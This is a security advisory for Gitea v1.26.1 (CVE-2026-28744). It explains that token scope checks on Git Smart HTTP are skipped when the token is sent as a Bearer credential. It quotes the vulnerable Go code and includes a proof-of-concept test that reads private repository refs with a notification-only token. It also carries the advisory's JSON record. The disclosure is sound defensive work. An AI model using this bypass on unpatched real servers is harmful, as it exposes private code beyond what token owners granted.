GHSA-CC8W-R4QH-3V65
Vulnerability from github – Published: 2026-06-16 23:38 – Updated: 2026-06-16 23:38Summary
Gitea v1.26.1 enforces repository-scoped access-token permissions on repository operations. In the Git Smart HTTP path, however, this check runs only when the token is presented via HTTP Basic authentication — CheckRepoScopedToken() returns early unless ctx.IsBasicAuth is true — so the same token sent as Authorization: Bearer <token> bypasses the scope check entirely.
As a result, a PAT or OAuth2 token presented as a Bearer credential can clone or fetch private repositories without the read:repository scope, and likewise reach the Git push without write:repository.
Details
Git Smart HTTP routes allow both Basic auth and OAuth2/Bearer auth:
// routers/web/web.go
addOwnerRepoGitHTTPRouters(
m,
repo.HTTPGitEnabledHandler,
webAuth.AllowBasic,
webAuth.AllowOAuth2,
repo.CorsHandler(),
optSignInFromAnyOrigin,
context.UserAssignmentWeb(),
)
The Git HTTP authorization path calls CheckRepoScopedToken() before falling through to normal repository RBAC:
// routers/web/repo/githttp.go
if askAuth {
if !ctx.IsSigned {
ctx.HTTPError(http.StatusUnauthorized)
return nil
}
context.CheckRepoScopedToken(ctx, repo, auth_model.GetScopeLevelFromAccessMode(accessMode))
if ctx.Written() {
return nil
}
// normal repository RBAC follows
}
However, CheckRepoScopedToken() only enforces token scopes for Basic-authenticated requests:
// services/context/permission.go
func CheckRepoScopedToken(ctx *Context, repo *repo_model.Repository, level auth_model.AccessTokenScopeLevel) {
if !ctx.IsBasicAuth || ctx.Data["IsApiToken"] != true {
return
}
scope, ok := ctx.Data["ApiTokenScope"].(auth_model.AccessTokenScope)
if ok {
requiredScopes := auth_model.GetRequiredScopes(level, auth_model.AccessTokenScopeCategoryRepository)
// public-only and required repository scope checks follow
}
}
The Bearer/OAuth2 auth path still records the token scope:
// services/auth/oauth2.go
accessTokenScope, uid := GetOAuthAccessTokenScopeAndUserID(ctx, tokenSHA)
if uid != 0 {
store.GetData()["IsApiToken"] = true
store.GetData()["ApiTokenScope"] = accessTokenScope
}
Bearer PATs also set IsApiToken=true and ApiTokenScope, but ctx.IsBasicAuth remains false because the selected auth method is OAuth2/Bearer rather than Basic. The scope is therefore available but ignored.
PoC
This test creates a token for user2 with only read:notification, then requests Git Smart HTTP refs for user2/repo2, which is private. The same token is rejected over Basic auth, but succeeds over Bearer auth.
func TestPOCGitSmartHTTPBearerTokenBypassesRepositoryScope(t *testing.T) {
defer tests.PrepareTestEnv(t)()
repo := unittest.AssertExistsAndLoadBean(t, &repo_model.Repository{ID: 2, OwnerName: "user2", Name: "repo2"})
assert.True(t, repo.IsPrivate)
session := loginUser(t, "user2")
token := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopeReadNotification)
url := "/user2/repo2/info/refs?service=git-upload-pack"
basicReq := NewRequest(t, "GET", url)
basicReq.SetBasicAuth(token, "x-oauth-basic")
MakeRequest(t, basicReq, http.StatusForbidden)
bearerReq := NewRequest(t, "GET", url).AddTokenAuth(token)
resp := MakeRequest(t, bearerReq, http.StatusOK)
assert.Contains(t, resp.Body.String(), "refs/heads/master")
}
Impact
Any Gitea instance exposing Git Smart HTTP is affected when users use PATs or OAuth2 tokens as Bearer tokens. The attacker still needs a token for a user who has normal repository RBAC, so this does not grant access to repositories the token owner could not otherwise access.
The vulnerability breaks the access-token scope boundary. A token intended only for unrelated scopes, such as read:notification, can clone or fetch private repository contents over Git Smart HTTP. The same root cause can affect write flows because git-receive-pack also calls the same repository scope check before normal write RBAC.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.26.1"
},
"package": {
"ecosystem": "Go",
"name": "code.gitea.io/gitea"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.26.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28744"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-16T23:38:12Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nGitea v1.26.1 enforces repository-scoped access-token permissions on repository operations. In the Git Smart HTTP path, however, this check runs only when the token is presented via HTTP Basic authentication \u2014 `CheckRepoScopedToken()` returns early unless `ctx.IsBasicAuth` is true \u2014 so the same token sent as `Authorization: Bearer \u003ctoken\u003e` bypasses the scope check entirely.\n\nAs a result, a PAT or OAuth2 token presented as a Bearer credential can clone or fetch private repositories without the `read:repository` scope, and likewise reach the Git push without `write:repository`.\n\n### Details\nGit Smart HTTP routes allow both Basic auth and OAuth2/Bearer auth:\n\n```go\n// routers/web/web.go\naddOwnerRepoGitHTTPRouters(\n\tm,\n\trepo.HTTPGitEnabledHandler,\n\twebAuth.AllowBasic,\n\twebAuth.AllowOAuth2,\n\trepo.CorsHandler(),\n\toptSignInFromAnyOrigin,\n\tcontext.UserAssignmentWeb(),\n)\n```\n\nThe Git HTTP authorization path calls `CheckRepoScopedToken()` before falling through to normal repository RBAC:\n\n```go\n// routers/web/repo/githttp.go\nif askAuth {\n\tif !ctx.IsSigned {\n\t\tctx.HTTPError(http.StatusUnauthorized)\n\t\treturn nil\n\t}\n\n\tcontext.CheckRepoScopedToken(ctx, repo, auth_model.GetScopeLevelFromAccessMode(accessMode))\n\tif ctx.Written() {\n\t\treturn nil\n\t}\n\n\t// normal repository RBAC follows\n}\n```\n\nHowever, `CheckRepoScopedToken()` only enforces token scopes for Basic-authenticated requests:\n\n```go\n// services/context/permission.go\nfunc CheckRepoScopedToken(ctx *Context, repo *repo_model.Repository, level auth_model.AccessTokenScopeLevel) {\n\tif !ctx.IsBasicAuth || ctx.Data[\"IsApiToken\"] != true {\n\t\treturn\n\t}\n\n\tscope, ok := ctx.Data[\"ApiTokenScope\"].(auth_model.AccessTokenScope)\n\tif ok {\n\t\trequiredScopes := auth_model.GetRequiredScopes(level, auth_model.AccessTokenScopeCategoryRepository)\n\t\t// public-only and required repository scope checks follow\n\t}\n}\n```\n\nThe Bearer/OAuth2 auth path still records the token scope:\n\n```go\n// services/auth/oauth2.go\naccessTokenScope, uid := GetOAuthAccessTokenScopeAndUserID(ctx, tokenSHA)\nif uid != 0 {\n\tstore.GetData()[\"IsApiToken\"] = true\n\tstore.GetData()[\"ApiTokenScope\"] = accessTokenScope\n}\n```\n\nBearer PATs also set `IsApiToken=true` and `ApiTokenScope`, but `ctx.IsBasicAuth` remains false because the selected auth method is OAuth2/Bearer rather than Basic. The scope is therefore available but ignored.\n\n### PoC\nThis test creates a token for `user2` with only `read:notification`, then requests Git Smart HTTP refs for `user2/repo2`, which is private. The same token is rejected over Basic auth, but succeeds over Bearer auth.\n\n```go\nfunc TestPOCGitSmartHTTPBearerTokenBypassesRepositoryScope(t *testing.T) {\n\tdefer tests.PrepareTestEnv(t)()\n\n\trepo := unittest.AssertExistsAndLoadBean(t, \u0026repo_model.Repository{ID: 2, OwnerName: \"user2\", Name: \"repo2\"})\n\tassert.True(t, repo.IsPrivate)\n\n\tsession := loginUser(t, \"user2\")\n\ttoken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopeReadNotification)\n\turl := \"/user2/repo2/info/refs?service=git-upload-pack\"\n\n\tbasicReq := NewRequest(t, \"GET\", url)\n\tbasicReq.SetBasicAuth(token, \"x-oauth-basic\")\n\tMakeRequest(t, basicReq, http.StatusForbidden)\n\n\tbearerReq := NewRequest(t, \"GET\", url).AddTokenAuth(token)\n\tresp := MakeRequest(t, bearerReq, http.StatusOK)\n\tassert.Contains(t, resp.Body.String(), \"refs/heads/master\")\n}\n```\n\n### Impact\nAny Gitea instance exposing Git Smart HTTP is affected when users use PATs or OAuth2 tokens as Bearer tokens. The attacker still needs a token for a user who has normal repository RBAC, so this does not grant access to repositories the token owner could not otherwise access.\n\nThe vulnerability breaks the access-token scope boundary. A token intended only for unrelated scopes, such as `read:notification`, can clone or fetch private repository contents over Git Smart HTTP. The same root cause can affect write flows because `git-receive-pack` also calls the same repository scope check before normal write RBAC.",
"id": "GHSA-cc8w-r4qh-3v65",
"modified": "2026-06-16T23:38:12Z",
"published": "2026-06-16T23:38:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-gitea/gitea/security/advisories/GHSA-cc8w-r4qh-3v65"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-gitea/gitea"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Gitea: Git Smart HTTP Skips Repository Token Scopes for Bearer Tokens"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.